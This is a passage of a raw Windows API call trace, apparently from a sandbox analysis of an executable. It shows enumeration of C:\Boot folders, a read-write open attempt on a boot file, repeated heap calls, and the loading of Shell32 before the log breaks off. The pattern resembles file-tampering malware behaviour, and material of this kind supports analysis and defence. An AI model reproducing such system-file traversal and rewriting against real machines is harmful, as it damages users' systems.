lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.861] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.861] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0178.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.862] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0178.862] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.864] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0178.864] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.864] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.865] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.896] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0178.896] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.896] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.896] PathFindFileNameW (pszPath="") returned="" [0178.896] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.897] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.897] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, 